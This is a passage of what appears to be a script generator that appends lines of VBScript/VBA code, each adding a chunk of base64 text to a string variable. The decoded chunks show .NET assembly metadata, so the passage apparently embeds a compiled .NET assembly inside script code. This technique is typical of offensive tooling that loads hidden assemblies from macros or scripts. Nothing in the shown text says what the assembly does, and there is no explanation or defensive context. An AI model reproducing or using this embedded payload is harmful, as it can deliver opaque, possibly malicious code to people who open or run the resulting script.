            code +="s = s & \"chwIAHBzuAAACnoCA307AAAEKh4CezwAAAQqggNvMgAACiD/fwAAMQtyHAgAcHO4AAAKegIDfTwA\"\n"
            code +="s = s & \"AAQqHgJ7PQAABCoiAgN9PQAABCoeAns+AAAEKiICA30+AAAEKh4Cez8AAAQqIgIDfT8AAAQqHgJ7\"\n"
            code +="s = s & \"QAAABCoiAgN9QAAABCoeAntBAAAEKiICA31BAAAEKgATMAIAQgAAAAAAAAACKBQAAAoDKCEAAAos\"\n"
            code +="s = s & \"C3IoCABwc68AAAp6BCghAAAKLAtyOAgAcHOvAAAKegIDKI0AAAYCBCiPAAAGAhcolwAABioeAntC\"\n"
            code +="s = s & \"AAAEKoIDbzIAAAoggAAAADELchwIAHBzuAAACnoCA31CAAAEKh4Ce0MAAAQqggNvMgAACiD/fwAA\"\n"
            code +="s = s & \"MQtyHAgAcHO4AAAKegIDfUMAAAQqHgJ7RAAABCoiAgN9RAAABCoeAntFAAAEKiICA31FAAAEKh4C\"\n"
            code +="s = s & \"e0YAAAQqIgIDfUYAAAQqHgJ7RwAABCoiAgN9RwAABCoeAntIAAAEKiICA31IAAAEKh4Ce0kAAAQq\"\n"
            code +="s = s & \"IgIDfUkAAAQqAAATMAIATQAAAAAAAAACKBQAAAoEKCEAAAosC3IoCABwc68AAAp6BSghAAAKLAty\"\n"
            code +="s = s & \"OAgAcHOvAAAKegIDKKAAAAYCBCicAAAGAgUongAABgIgAgAEACioAAAGKgAAABMwCQDLAAAAFQAA\"\n"
            code +="s = s & \"ESD/AAAAc7kAAAoKIP8AAABzuQAACgsg/wAAAHO5AAAKDAZvugAACg0Hb7oAAAoTBAhvugAAChMF\"\n"
            code +="s = s & \"Ai0DFisBFwMEBhIDBxIECBIFKLAAAAYtUCirAAAKEwYRBh96MzsGCW+7AAAKCBEFb7sAAAoHEQRv\"\n"
            code +="s = s & \"uwAACgItAxYrARcDBAYSAwcSBAgSBSiwAAAGLRMoqwAACnOtAAAKehEGc60AAAp6c4EAAAYlBm85\"\n"
            code +="s = s & \"AAAKb3oAAAYlB285AAAKb3wAAAYlCG85AAAKb34AAAYqABswCQAiAQAAFgAAESD/AAAACiD/AAAA\"\n"
            code +="s = s & \"CyD/AAAADH6gAAAKDX6gAAAKEwR+oAAAChMFBiiqAAAKDQcoqgAAChMECCiqAAAKEwUCLQMWKwEX\"\n"
            code +="s = s & \"AwQJEgARBBIBEQUSAiixAAAGLVcoqwAAChMGEQYfejNCCQYorAAACg0RBAcorAAAChMEEQUIKKwA\"\n"
            code +="s = s & \"AAoTBQItAxYrARcDBAkSABEEEgERBRICKLEAAAYtEyirAAAKc60AAAp6EQZzrQAACnpzigAABiUJ\"\n"
            code +="s = s & \"Bii1AAAGb4MAAAYlEQQHKLUAAAZvhQAABiURBQgotQAABm+HAAAGEwfePgl+oAAACiipAAAKLAYJ\"\n"
            code +="s = s & \"KK4AAAoRBH6gAAAKKKkAAAosBxEEKK4AAAoRBX6gAAAKKKkAAAosBxEFKK4AAArcEQcqAAABEAAA\"\n"
            code +="s = s & \"AgAmALvhAD4AAAAAEzAEACsAAAAXAAARc6UAAAoKFgsCByUXWAsYWii8AAAK0QwILAkGCG+mAAAK\"\n"
            code +="s = s & \"K+UGb6cAAAoGKgATMAQAKgAAABgAABFzpQAACgoWCysUBgIHGFoovAAACtFvpgAACgcXWAsHAzLo\"\n"
            code +="s = s & \"Bm+nAAAKBio2AntPAAAEA2+mAAAKKnICKBQAAAoC0BUAAAIohwAACii9AAAKfVUAAAQqAAAAQlNK\"\n"
            code +="s = s & \"QgEAAQAAAAAADAAAAHYyLjAuNTA3MjcAAAAABQBsAAAAyCIAACN+AAA0IwAA9B0AACNTdHJpbmdz\"\n"
            code +="s = s & \"AAAAAChBAABICAAAI1VTAHBJAAAQAAAAI0dVSUQAAACASQAAdAkAACNCbG9iAAAAAAAAAAIAAAFX\"\n"
            code +="s = s & \"P6IdCR4AAAD6ATMAFgAAAQAAAGYAAAAVAAAAWQAAALgAAAArAQAABAAAAL0AAAAmAAAATQAAAAIA\"\n"
            code +="s = s & \"AAAYAAAACAAAAC0AAABPAAAAAgAAABAAAAAJAAAAAQAAAAQAAAAJAAAAAgAAAAUAAAACAAAAAAAt\"\n"
            code +="s = s & \"EQEAAAAAAAoAMQzJFwYArAzJFwYAGQ3JFwYA1wsNFxMA6RcAAAYA/wuHEgYAgAyHEgYAYQyHEgYA\"\n"
            code +="s = s & \"AA2HEgYAzAyHEgYA5QyHEgYAFgyHEgYA6wuqFwYAyQuqFwYARAyHEgYAyBqSEQ4AThEiEg4Aigds\"\n"
            code +="s = s & \"Fw4AeQtsFw4AOwYiEgYArBOSEQ4AZwYiEgYAYQDjEA4AtxoiEg4AQgAiEg4AbRMiEgYAjRiSEQ4A\"\n"
            code +="s = s & \"YxxBHA4AyRFBHAYAOgWSEQYA9xNLEg4A0QZBHAYAwRGSEQ4AYBJBHAYAtxS9HA4ADQdBHAYAmQB8\"\n"
            code +="s = s & \"BA4AthNBHAYAbgB8BA4AxxNBHAYAKwB8BA4AWhAiEg4AFRgiEg4AUxkiEgYAbw/GHQYAkBaSEQ4A\"\n"
            code +="s = s & \"fAYiEgYA4wqSEQYAfAB8BAYAVR2HEgYANR2DAAYApBPGHQ4ATA5BHA4AUhhBHA4APBFBHA4AAQlB\"\n"
            code +="s = s & \"HA4AORRBHA4AuhlBHAYAnQySEQYAnhGSEQYArgvJFwYAog69HAYAMhySEQ4AdRUiEg4AeR1sFwYA\"\n"
            code +="s = s & \"7BaRDgYAiA+SEQ4AmRJsFw4ASAZsFw4APhhsFwYAxQhAGQ4AcAYiEg4Aax0iEg4AAxQiEg4AjQsi\"\n"
            code +="s = s & \"EgYA0QSRDgYAOROSEQYASAmSEQYAxRZAGQYA0QiSEQYApxSSEQYAkwCSEQYAohSSEQ4AVQAiEg4A\"\n"
            code +="s = s & \"QRQiEg4A5B0iEg4AaRkiEgYAFQnFAgYAuhuSEWcBxRQAAAYA1g/FAgYAiR2DAAYA6AqSEQYA3QiS\"\n"
            code +="s = s & \"EQYAAheSEQYAiRGSEQYAUhCqFxIAKhMCEQYAfhOSEQYAUROSEQoAxgiQFAYAOQCSEQAAAAC7AAAA\"\n"
            code +="s = s & \"AAABAAEAAQAQAGocAABBAAEAAQAAABAAOgkAAEEAAgAEAAAAEACgHAAAcQAIAA0AAAAQAOUGAACB\"\n"
            code +="s = s & \"AA4AHwABABAA+BcAAEEADwA3AAAAEAAkBwAAkQATAD8AgQEQAEQCAABBABMAWQChAAAAmhsAAAAA\"\n"
            code +="s = s & \"EwB5AAEAEACbGwAAQQATAHkAAQAQAHYbAABBABcAggCBARAAWxcAAEEAGwCLAAsBEgC5AgAAwQAb\"\n"
            code +="s = s & \"AIwAAgEAAHEOAADxACAAjAACAQAAWA4AAPEAKQCMAAIAEACXGQAAQQA7AIwAAgAQAHsZAABBAEIA\"\n"
            code +="s = s & \"mwCDARAATRcAAEEASgCsAAMBEAABAAAAQQBPALYAAgEAAMEHAADxAFAAuAAKABAAuQIAAEEAVQC4\"\n"
            code +="s = s & \"ABEAmBVIBQEAXRtMBQEAFghPBQEApxxSBQMANwdWBQEARxFaBQEARRBeBQYAXAdWBREAqgRhBQEA\"\n"
            code +="s = s & \"XhFIBQEA7xNlBQEA2RNlBQEA+QZpBQEALhBtBVOAxQ9kAlOADh1kAlOALQtkAlOAIh1kAgEAswVk\"\n"
            code +="s = s & \"AgEAlwVkAgEAXgVkAgEAPwVMBQEAswVxBQEAlwVxBQEAXgVxBQEAPwVMBQYAXA1PBQYA5BtDAwYA\"\n"
            code +="s = s & \"yRxkAgYA2BxkAgYAwxVDAwYGawRPBVaAxAB2BVaA+QN2BVaASgR2BVaAMwR2BVaAfwN2BVaAzwJ2\"\n"
            code +="s = s & \"BVaAmgN2BVaA4wN2BQYGawRPBVaABAF6BVaAxwN6BVaA8AJ6BVaAEwN6BVaAfQF6BVaADAR6BVaA\"\n"
            code +="s = s & \"IQJ6BVaA5QB6BVaAWwJ6BVaAJAF6BVaAQwF6BVaAsgN6BVaAeQJ6BVaAmAJ6BVaANQN6BVaAVgN6\"\n"
            code +="s = s & \"BVaAYgF6BQEAIRNkAgEApAhkAgEAGwZDAwEA6QVDAwEAPwVMBQEABAZ2BQEAeAVPBQEAIRNkAgEA\"\n"
            code +="s = s & \"pAhkAgEAzQVkAgEAGwZDAwEA6QVDAwEAPwVMBQEABAZ6BQEAeAVPBVaAuQFPBVaABwJPBVaA0wFP\"\n"
            code +="s = s & \"BVaA7AFPBVaAngFPBQYAsxtxBQYGawRPBVaADhp+BVaAJAV+BVaA/xV+BVaAchh+BQYAXA1PBQYA\"\n"
            code +="s = s & \"5BtDAwYQyRxkAgYQ2BxkAgYAwxVDA1AgAAAAAIYAihWCBQEAeiAAAAAAhhjfFgEAAgCCIAAAAACR\"\n"
            code +="s = s & \"GOUWWAICAJAgAAAAAIYY3xYBAAIArCEAAAAAhggxG5sBAgC0IQAAAACGCEAbFQACAL0hAAAAAIYI\"\n"
            code +="s = s & \"/AflAAMAxSEAAAAAhggJCAUAAwDQIQAAAACBAM0VnQIEANAiAAAAAIEAlBOHBQYAECQAAAAAhgA3\"\n"
            code +="s = s & \"DRAABwBEJAAAAACBANYAjQUIAMwkAAAAAIYY3xaUBQoABiUAAAAAxggaCxoBCwAOJQAAAADGCAUL\"\n"
            code +="s = s & \"GgELABYlAAAAAMYImwSaBQsAHSUAAAAAxgiECRABCwAkJQAAAADGCD0C7QALACwlAAAAAMYIvRFM\"\n"
            code +="s = s & \"AwsANyUAAAAA5gnrBJsBCwBCJQAAAADmCUIHnwULAE8lAAAAAIMITwdbAAsAXSUAAAAAxgAPHAEA\"\n"
            code +="s = s & \"DABpJQAAAADGACEcAQAMAHUlAAAAAMYA/hEBAAwAdSUAAAAAxgDpEQEADAB3JQAAAADGAE8bBQAM\"\n"
            code +="s = s & \"AJElAAAAAOYBhwcBAA0ApiUAAAAA5gF6B1sADQC7JQAAAACRGOUWWAIOAAAAAACAAJYgYwifAw4A\"\n"
            code +="s = s & \"AAAAAIAAkSADGaQFDwAAAAAAgACRIEEVtwUYAMclAAAAAMYIUQLNBSEA0CUAAAAAxgArHNMFIQBw\"\n"
            code +="s = s & \"JgAAAADGAJwH5wUkAHwnAAAAAOYBnAf1BSgAoCkAAAAAxgBnEAwGLADUKQAAAADGAGcQFgYwAAgq\"\n"
            code +="s = s & \"AAAAAMYAewoQATYADyoAAAAAxgBlDyYGNgAbKgAAAADGAKgLEAA2ACQqAAAAAMYAqAtVATcAXCoA\"\n"
            code +="s = s & \"AAAAxgCVClUBOgCUKgAAAADGALAKEAA9AMIqAAAAAMYAvwoQAD4AzioAAAAAxgCVCgEAPwDVKgAA\"\n"
            code +="s = s & \"AADGAJUKEAA/AOAqAAAAAMYAhAoQAEAAECsAAAAAxgCfChAAQQB1JQAAAADGABYaLAZCAEArAAAA\"\n"
            code +="s = s & \"AJEAxhA0BkQAwCsAAAAAkQAlGToGRQAULAAAAACGGN8WAQBGACgsAAAAAJMAGglLBkYAkywAAAAA\"\n"
            code +="s = s & \"kwA6F1QGSgCcLAAAAACTADoXWwZLAIwtAAAAAJMAjQljBk0AmC0AAAAAkwCNCWkGTwAELgAAAACT\"\n"
            code +="s = s & \"AE0LGQNSAJAuAAAAAJEAoQ8ZA1MAeiAAAAAAhhjfFgEAVADALgAAAADGCFgWcAZUAMcuAAAAAMYI\"\n"
            code +="s = s & \"bBZ2BlQAzy4AAAAAxghjDX0GVQDgLgAAAADGCHINgwZVAPUuAAAAAMYIqxKKBlYA9S4AAAAAxgi+\"\n"
            code +="s = s & \"EpAGVgABLwAAAADGCNsN5QBXAAgvAAAAAMYI6g0FAFcAEC8AAAAAxgggFnAGWAAXLwAAAADGCDQW\"\n"
            code +="s = s & \"dgZYAB8vAAAAAMYItAibAVkAJi8AAAAAxggXDn0GWQAmLwAAAADGCD8OfQZZADcvAAAAAMYI0RKK\"\n"
            code +="s = s & \"BlkASC8AAAAAxgjkEpAGWQBdLwAAAADGCPkNfQZaAG4vAAAAAMYICA6DBloAgy8AAAAAxghkCRAB\"\n"
            code +="s = s & \"WwCKLwAAAADGCHQJEABbAHUlAAAAAMYAYBUBAFwAki8AAAAAxgBIGpcGXACeLwAAAADGAAYdpgZd\"\n"
            code +="s = s & \"AKovAAAAAMYAMxqvBl4Ati8AAAAAxgBaGr8GYgC2LwAAAADGAFoazwZkAMIvAAAAAIYY3xYBAGYA\"\n"
            code +="s = s & \"yi8AAAAAlgArHNkGZgDVLwAAAACWACsc4AZoAOEvAAAAAJYAKxzoBmsA8S8AAAAAlgArHPEGbwAh\"\n"
            code +="s = s & \"MAAAAACWAA0P+wZ0AC8wAAAAAJYADQ8CB3YAPzAAAAAAlgANDwoHeQBPMAAAAACWAA0PFwd9AH8w\"\n"
            code +="s = s & \"AAAAAJYACRnZBoIAkjAAAAAAlgAJGeAGhACcMAAAAACWAAkZ6AaHAKwwAAAAAJYACRnxBosAzDAA\"\n"
            code +="s = s & \"AAAAlgAJGSUHkACgMQAAAACWAOEO+waTALAxAAAAAJYA4Q4CB5UAvDEAAAAAlgDhDgoHmADMMQAA\"\n"
            code +="s = s & \"AACWAOEOFwecAOsxAAAAAJYA4Q4uB6EA+DEAAAAAkQCYEDsHpAAMNAAAAACWAO4YSQenABs0AAAA\"\n"
            code +="s = s & \"AJYA7hhRB6oAJjQAAAAAlgDuGFoHrgA4NAAAAACWAO4YZAezAFI0AAAAAJYA7hhvB7kAXDQAAAAA\"\n"
            code +="s = s & \"lgDuGHYHugAYNQAAAACWALwOfwe9ACc1AAAAAJYAvA6HB8AANDUAAAAAlgC8DpAHxABGNQAAAACW\"\n"
            code +="s = s & \"ALwOngfJAGA1AAAAAJYAvA6tB88AajUAAAAAlgC8DrQH0AB0NQAAAACRAHsQwQfTAMA3AAAAAIYI\"\n"
            code +="s = s & \"4wkQAdYAyDcAAAAAgwjwCRAA1gDRNwAAAACGCKQJEAHXANk3AAAAAIMIswkQANcA4jcAAAAAhgiS\"\n"
            code +="s = s & \"BhAB2ADqNwAAAACDCJ8GEADYAPM3AAAAAIYIAAWbAdkA+zcAAAAAhggSBRUA2QB6IAAAAACGGN8W\"\n"
            code +="s = s & \"AQDaAAQ4AAAAAIYI4wkmBtoADDgAAAAAgwjwCc8H2gAVOAAAAACGCKQJJgbbAB04AAAAAIMIswnP\"\n"
            code +="s = s & \"B9sAJjgAAAAAhgiSBiYG3AAuOAAAAACDCJ8GzwfcADc4AAAAAIYIAAWbAd0APzgAAAAAhggSBRUA\"\n"
            code +="s = s & \"3QB6IAAAAACGGN8WAQDeAEg4AAAAAJYAJw/WB94AiDgAAAAAhggJExAB3wCQOAAAAACGCBUTEADf\"\n"
            code +="s = s & \"ALE4AAAAAIYIjAgQAeAAuTgAAAAAhgiYCBAA4ADaOAAAAACGCMYb3QfhAOI4AAAAAIYI1RvhB+EA\"\n"
            code +="s = s & \"6zgAAAAAhginFd0H4gDzOAAAAACGCLUV4QfiAPw4AAAAAIYIAAWbAeMABDkAAAAAhggSBRUA4wAN\"\n"
            code +="s = s & \"OQAAAACGCF4Y5gfkABU5AAAAAIYIaBjrB+QAHjkAAAAAhgjYB+UA5QAmOQAAAACGCOoHBQDlADA5\"\n"
            code +="s = s & \"AAAAAIYY3xawA+YAfjkAAAAAhggJExAB6ACGOQAAAACGCBUTEADoAKc5AAAAAIYIjAgQAekArzkA\"\n"
            code +="s = s & \"AAAAhgiYCBAA6QDQOQAAAACGCCIKEAHqANg5AAAAAIYIMQoQAOoA4TkAAAAAhgjGG90H6wDpOQAA\"\n"
            code +="s = s & \"AACGCNUb4QfrAPI5AAAAAIYIpxXdB+wA+jkAAAAAhgi1FeEH7AADOgAAAACGCAAFmwHtAAs6AAAA\"\n"
            code +="s = s & \"AIYIEgUVAO0AFDoAAAAAhgheGPEH7gAcOgAAAACGCGgY9gfuACU6AAAAAIYI2AflAO8ALToAAAAA\"\n"
            code +="s = s & \"hgjqBwUA7wA4OgAAAACGGN8W/AfwAAAAAACAAJYg6BgDCPMAAAAAAIAAliADGRUI/QAAAAAAgACW\"\n"
            code +="s = s & \"ICQVKQgGAQAAAACAAJYgJBUzCAsBAAAAAIAAliBBFT0IEAEAAAAAgACWIEEVUwgZAZQ6AAAAAJYA\"\n"
            code +="s = s & \"VRRjCCIBbDsAAAAAlgA2D2sIJQGsPAAAAACWACQPcwgoAeQ8AAAAAJYAJA96CCkBeiAAAAAAhhjf\"\n"
            code +="s = s & \"FgEAKwEaPQAAAACDABYAZgMrASg9AAAAAIYY3xYBACwBAAABANgEAAABAEgNAAABAEgNAAABADcG\"\n"
            code +="s = s & \"AAACAK4cAAABAE8OAAABADcGAAABANMUAAACAE8OAAABAF4RAAABAEgNAAABABYIAAABAJMHAAAB\"\n"
            code +="s = s & \"AAkXAAABAO0KAAACALsWAAADAIAIAAAEAOkUAAAFAIMNAgAGAAIVAgAHAJQNAAAIAE8NAAAJAIcY\"\n"
            code +="s = s & \"AAABAH8YAAACAPYUAAADANoUAAAEAA0KAAAFAP0JAAAGANUJAAAHAGoKAAAIALwGAAAJAKwGAAAB\"\n"
            code +="s = s & \"ACITAAACAKUIAAADAMkZAAABACITAAACAKUIAAADAKIXAAAEAKwHAAABACITAAACAKUIAAADAKIX\"\n"
            code +="s = s & \"AAAEAJMXAAABACITAAACAKUIAAADABkKAAAEAE4KAAABACITAAACAKUIAAADABkKAAAEAE4KAAAF\"\n"
            code +="s = s & \"ACcYAAAGANYZAAABAEgNAAABAEgWAAACAIAWAAADAEgNAAABAEgWAAACAIAWAAADAEgNAAABAKUI\"\n"
            code +="s = s & \"AAABAEgNAAABAEgNAAABAKUIAAABAKUIAAABALUEAAACAIsGAAABAK4cAAABAKIXAAABAJAaAAAC\"\n"
            code +="s = s & \"AIwcAAADAHwaAAAEAHUcAAABAL4EAAABAL4EAAACACsJAAABAL4EAAACAOMVAAABAL4EAAACAOMV\"\n"
            code +="s = s & \"AAADACsJAAABAL4EAAABAL4EAAABAEgNAAABAEgNAAABAEgNAAABAEgNAAABAEgNAAABAEgNAAAB\"\n"
            code +="s = s & \"AEgNAAABAEgNAAABAAsJAAABANYZAAABALoHAAACAD8SAAADAHgUAAAEAFkRAAABAKgRAAACAGwa\"\n"
            code +="s = s & \"AAABAAsJAAACAFkRAAABACITAAACAKUIAAABACITAAACAKUIAAADAOQbAAABACITAAACAKUIAAAD\"\n"
            code +="s = s & \"ABkKAAAEAMgGAAABACITAAACAKUIAAADAOQbAAAEABkKAAAFAMgGAAABACITAAACAKUIAAABACIT\"\n"
            code +="s = s & \"AAACAKUIAAADAOQbAAABACITAAACAKUIAAADABkKAAAEAMgGAAABACITAAACAKUIAAADAOQbAAAE\"\n"
            code +="s = s & \"ABkKAAAFAMgGAAABACITAAACAKUIAAABACITAAACAKUIAAADAOQbAAABACITAAACAKUIAAADABkK\"\n"
            code +="s = s & \"AAAEAMgGAAABACITAAACAKUIAAADAOQbAAAEABkKAAAFAMgGAAABANYZAAACABkKAAADAMgGAAAB\"\n"
            code +="s = s & \"ACITAAACAKUIAAABACITAAACAKUIAAADAOQbAAABACITAAACAKUIAAADABkKAAAEAMgGAAABACIT\"\n"
            code +="s = s & \"AAACAKUIAAADAOQbAAAEABkKAAAFAMgGAAABANYZAAACABkKAAADAMgGAAABANYZAAACABkKAAAD\"\n"
            code +="s = s & \"AMgGAAABAE4KAAACACITAAADAKUIAAABAE4KAAACACITAAADAKUIAAAEAOQbAAABAE4KAAACACIT\"\n"
            code +="s = s & \"AAADAKUIAAAEABkKAAAFAMgGAAABAE4KAAACACITAAADAKUIAAAEAOQbAAAFABkKAAAGAMgGAAAB\"\n"
            code +="s = s & \"ANYZAAABANYZAAACABkKAAADAMgGAAABAE4KAAACACITAAADAKUIAAABAE4KAAACACITAAADAKUI\"\n"
            code +="s = s & \"AAAEAOQbAAABAE4KAAACACITAAADAKUIAAAEABkKAAAFAMgGAAABAE4KAAACACITAAADAKUIAAAE\"\n"
            code +="s = s & \"AOQbAAAFABkKAAAGAMgGAAABANYZAAABANYZAAACABkKAAADAMgGAAABANYZAAACABkKAAADAMgG\"\n"
            code +="s = s & \"AAABAEgNAAABAEgNAAABAEgNAAABAEgNAAABAEgNAAABAEgNAAABAEgNAAABAEgNAAABAJcEAAAB\"\n"
            code +="s = s & \"AEgNAAABAEgNAAABAEgNAAABAEgNAAABAEgNAAABAEgNAAABAEgNAAABACITAAACAKUIAAABAEgN\"\n"
            code +="s = s & \"AAABAEgNAAABAEgNAAABAEgNAAABAEgNAAABAEgNAAABAEgNAAABAEgNAAABAE4KAAACACITAAAD\"\n"
            code +="s = s & \"AKUIAAABADEUAAACAEAKAAADAC4FAAAEAK8WAAAFAA0KAAAGAPsZAAAHALwGAAAIAOgZAAAJAE4N\"\n"
            code +="s = s & \"AAAKAH8YAAABADEUAAACAK8WAAADAHEIAAAEAOcUAAAFAIENAgAGABMVAgAHAKkNAAAIAE4NAAAJ\"\n"
            code +="s = s & \"AH8YAAABAH8YAAACAA0KAAADALwGAAAEALkYAAAFAKQYAAABAH8YAAACAA0KAAADALwGAAAEALkY\"\n"
            code +="s = s & \"AAAFAKQYAAABAH8YAAACAPYUAAADANoUAAAEAA0KAAAFAP0JAAAGANUJAAAHAGoKAAAIALwGAAAJ\"\n"
            code +="s = s & \"AKwGAAABAH8YAAACAPYUAAADANoUAAAEAA0KAAAFAP0JAAAGANUJAAAHAGoKAAAIALwGAAAJAKwG\"\n"
            code +="s = s & \"AAABAMwYAAACAPQWAAADAL4NAAABAMwYAAACAPQWAAADAL4NAAABAI4UAAABAI4UAAACACcQAAAB\"\n"
            code +="s = s & \"AJkEBAB1AAUAiQAKACQACwAkAAkA3xYBABEA3xYFABkA3xYBACEA3xYKADEA3xYQADkA3xYQAEEA\"\n"
            code +="s = s & \"3xYQAEkA3xYQAFEA3xYQAFkA3xYQAGEA3xYQAGkA3xYVAHEA3xYQAHkA3xYQANkB3xYBAOkB3xYB\"\n"
            code +="s = s & \"APEBHwgeAPkBqw4kAPEBhQ8qAIEA3xYBAJkAaBs8AAEC3xYQAJkAcRVBAAkCawdIAJEAoxEBABEC\"\n"
            code +="s = s & \"EBZRAIkAaAtWABECYxtRAIkATwdbAIkALRdhAIkArQhnAIkAYAsBABkC1h10AIkABRx5AIkARQZ5\"\n"
            code +="s = s & \"AIkAIBd/AKEAIBeEAAwAdxGSACkCJBqYAIkArQiiALEAVwbBAEEC3xbHABQA3xYBABQA5wTYABQA\"\n"
            code +="s = s & \"nwsBABwA+xvlABwAdxGSAMEAwBrpAOEAPQLtABkCHBDlABkCjw/zAAEBvwoQAIkAGRQEAVECbwsK\"\n"
            code +="s = s & \"AYkAixQBANkA2BAVAIEAfA8QAWECxgQUAWECGgsaAWECBQsaAeEA3xYBAAkB3xYfAWkC3xYQAPEA\"\n"
            code +="s = s & \"NwUnARkCoRpNAQEBqAtVASQA3xYBACwA0RZxATQA7xuEATEBvBAQAQEBlQoQAHECewqJATEBhAkQ\"\n"
            code +="s = s & \"AcEAtRqNASQAgBGTAXkCtBybAYECYAsBAAEBlQpVARkB3xYBAPkAGguvATwAzxrzABkCrhq8ARkB\"\n"
            code +="s = s & \"UAbGAUQA+xvlABkCmREQARkC2xXVARkCrB3bARkCoRrhAUwA3xYBAFQA0RZxAVwA7xuEAUwA5wTY\"\n"
            code +="s = s & \"ABkBqBofAhkBHBDlABkBVQ0rAkwA+xvlAFEB3xY4AnECqAtAAnECIBZLAnECWBZLAnECNBZRAnEC\"\n"
            code +="s = s & \"bBZRAnEClQpAAnEClQpYAhkC3h1kAhkCKxtnAhkC3hluApkCfA8QATwA3xaAAkQAdxGSAEEBvBAQ\"\n"
            code +="s = s & \"ATwA0xqGAgEB3xYBAMEA3xaNAsEABhiSArEC3xadAmQA5wTYAGwA3xYBAKEA3xYBAKEARQbKAqEA\"\n"
            code +="s = s & \"8hXQAmwA5wTYAMECdRp0AKEARQbXAmwA5xzeAskCtw/pAtkCzgrhARkCoRrwAuEC1goCA5kB+xwH\"\n"
            code +="s = s & \"A5kBPw0OA5EBTR0TA5EBFRIQAdkCWQoZA+kC7wgeA5EBQR0nA3EC5Q8wA3EC8RowA6kB3xaAAqkB\"\n"
            code +="s = s & \"2w/lAKkB5hrlAHECzQ00A3EC2w0wA3EC6g06A3ECtAg/A3ECBRAwA3ECExswA3EC1xowA3ECfRQw\"\n"
            code +="s = s & \"A7EB3xaAArEBLQTlALEBZQTlAHEC9xI0A3EC9Q8wA3ECAhswA3ECMQ40A3ECUAmJAXECWglAAiEB\"\n"
            code +="s = s & \"3xYBAPkCUBRDA8kCrxFGAwEDvRFMAwkBFhblAMkCwgmJAWkB3xYBAGkBnBRmA2kBXh0BAAkDRAiE\"\n"
            code +="s = s & \"A/kCuB2LAwkDaBGRAwkDnRYwAwkDZhGWAxED3xYFAAkDKwifAxkD3xYQAGkBHBDlACED3xawAwkD\"\n"
            code +="s = s & \"sAC2AwkDNhC9AxkC7xzHAykDOhzMA3wA3xbpA4QAmQ/2AyED3xYQABkB3xYFABkBkh3lABkBnx0F\"\n"
            code +="s = s & \"AAkDpgAlBAkDUQ4yBA4APABLBA4AQACGBA4ARACnBA4ASADGBAgAhADJBAgAiADOBAgAjADTBAgA\"\n"
            code +="s = s & \"kADYBAgAlADdBAgAmADiBAgAnADnBAgAoADsBAgAqADJBAgArADOBAgAsADxBAgAtAD2BAgAuADT\"\n"
            code +="s = s & \"BAgAvAD7BAgAwAAABQgAxADdBAgAyADiBAgAzAAFBQgA0AAKBQgA1ADnBAgA2AAPBQgA3AAUBQgA\"\n"
            code +="s = s & \"4AAZBQgA5AAeBQgA6AAjBQgAKAEoBQgALAEABQgAMAEtBQgANAEtBQgAOAHdBAgARAEyBQgASAE3\"\n"
            code +="s = s & \"BQgATAE8BQgAUAFBBS4ACwDJBC4AEwDVCC4AGwDeCC4AIwD9CC4AKwAGCS4AMwAWCS4AOwAWCS4A\"\n"
            code +="s = s & \"QwAWCS4ASwAGCS4AUwAcCS4AWwAWCS4AYwAWCS4AawA0CS4AcwBeCUMAYwBrCYMBCwDJBMMBewDJ\"\n"
            code +="s = s & \"BOMBewDJBGECgwDJBGMCgwDJBIECgwDJBKECgwDJBMECgwDJBOECgwDJBAEDgwDJBCEDgwDJBEED\"\n"
            code +="s = s & \"gwDJBKEHgwDJBMEHgwDJBOEHgwDJBAEIgwDJBCEIgwDJBIEIgwDJBKEIgwDJBMEIgwDJBOEIgwDJ\"\n"
            code +="s = s & \"BAEJgwDJBCEJgwDJBCAPgwDJBEAPgwDJBGAPgwDJBIAPgwDJBKAPgwDJBMAPgwDJBOAPgwDJBAAQ\"\n"
            code +="s = s & \"gwDJBEAQgwDJBGAQgwDJBIAQgwDJBKAQgwDJBMAQgwDJBOAQgwDJBAARgwDJBCARgwDJBGARCwDJ\"\n"
            code +="s = s & \"BAASgwDJBCASgwDJBEASgwDJBGASgwDJBIASgwDJBKASgwDJBMASgwDJBOASgwDJBAATgwDJBCAT\"\n"
            code +="s = s & \"gwDJBOATgwDJBAAUgwDJBCAUgwDJBEAUgwDJBGAUgwDJBIAUgwDJBKAUgwDJBMAUgwDJBOAUgwDJ\"\n"
            code +="s = s & \"BAAVgwDJBCAVgwDJBEAVgwDJBK4ARgWwAEYFGgAwAHAArgD5AP4ALAGfAecBMwJFAlwCcwKsAuQC\"\n"
            code +="s = s & \"9wJSA3ADpAPCAwEEEQQdBCsEAwABAAQAAwAFAAsABwAMAAoAFwALABsAEAAfABEAJgAAAFIbgggA\"\n"
            code +="s = s & \"AA0IhggAAB4LiggAAAkLiggAAJ8EjwgAAGUKlAgAAFgCmAgAAMERnggAAO8EgggAAIoHpAgAAFUC\"\n"
            code +="s = s & \"qQgAAHAWrwgAANANtQgAAMISuwgAAO4NhggAADgWrwgAALgIgggAABsOtQgAAEMOtQgAAPoSuwgA\"\n"
            code +="s = s & \"AEYOtQgAAHgJlAgAABAKlAgAANgJlAgAAL8GlAgAABYFgggAABAKwQgAANgJwQgAAL8GwQgAABYF\"\n"
            code +="s = s & \"gggAABkTlAgAAJwIlAgAANkbxwgAALkVxwgAABYFgggAAIEYywgAAO4HhggAABkTlAgAAJwIlAgA\"\n"
            code +="s = s & \"AEMKlAgAANkbxwgAALkVxwgAABYFgggAAIEY0AgAAO4HhggCAAUAAwABAAYAAwACAAcABQABAAgA\"\n"
            code +="s = s & \"BQACAA4ABwACAA8ACQACABAACwACABEADQACABIADwACABMAEQACABQAEwACABUAFQABABYAFQAC\"\n"
            code +="s = s & \"ACIAFwACAD8AGQABAEAAGQACAEEAGwABAEIAGwACAEMAHQABAEQAHQACAEUAHwABAEYAHwACAEcA\"\n"
            code +="s = s & \"IQABAEgAIQACAEkAIwACAEoAJQACAEsAJwACAEwAKQABAE0AKQACAE4AKwABAE8AKwACAFAALQAB\"\n"
            code +="s = s & \"AFEALQACAHkALwABAHoALwACAHsAMQABAHwAMQACAH0AMwABAH4AMwACAH8ANQABAIAANQACAIIA\"\n"
            code +="s = s & \"NwABAIMANwACAIQAOQABAIUAOQACAIYAOwABAIcAOwACAIgAPQABAIkAPQACAIwAPwABAI0APwAC\"\n"
            code +="s = s & \"AI4AQQABAI8AQQACAJAAQwABAJEAQwACAJIARQABAJMARQACAJQARwABAJUARwACAJYASQABAJcA\"\n"
            code +="s = s & \"SQACAJgASwABAJkASwACAJsATQABAJwATQACAJ0ATwABAJ4ATwACAJ8AUQABAKAAUQACAKEAUwAB\"\n"
